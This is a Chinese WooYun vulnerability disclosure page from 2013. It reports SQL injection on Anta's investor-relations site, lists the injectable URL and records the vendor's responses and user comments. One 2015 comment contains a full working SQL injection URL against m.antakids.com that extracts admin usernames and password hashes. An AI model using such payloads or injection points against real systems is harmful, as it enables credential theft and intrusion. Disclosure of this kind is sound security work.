当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-026107

漏洞标题:安踏官网随处都是注入 可getshell 可拿服务器

相关厂商:anta.com

漏洞作者: 豆浆

提交时间:2013-06-20 11:47

修复时间:2013-06-25 11:47

公开时间:2013-06-25 11:47

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-20: 细节已通知厂商并且等待厂商处理中
2013-06-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大半夜的无意间加了个分号,结果……
虽然注入的在二级域名但是权限很大。都1:30了。不深入了。

详细说明:

注入点:http://ir.anta.com/tc/home.php?option=4&Itemid=160565

漏洞证明:

1.png


2.png

修复方案:

你猜?

版权声明:转载请注明来源 豆浆@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-06-25 11:47

厂商回复:

最新状态:

2013-06-25:感谢关注安踏安全,目前己通知相关人员修复中

2013-06-27:问题己修复。感谢关注安踏的信息安全。


漏洞评价:

评论

  1. 2013-06-17 11:59 | Nicky ( 普通白帽子 | Rank:477 漏洞数:68 | http://www.droidsec.cn 安卓安全中文站)

    。。安踏主站早就被注入X遍了

  2. 2013-06-25 13:55 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    先忽略再修复 牛逼!

  3. 2013-06-25 17:19 | 安踏(乌云厂商)

    @Black Angel 不是你想象的样子,是首次使用乌云网,还不知道如何操作,超出了时限,自动变成厂商忽略

  4. 2015-02-06 11:22 | 刘洪泽 ( 普通白帽子 | Rank:130 漏洞数:34 | 一个到处找密码的小号..........)

    @安踏 提醒下哈 http://m.antakids.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294这个你真的没修复 都被人糟蹋了。。去吧~ 么么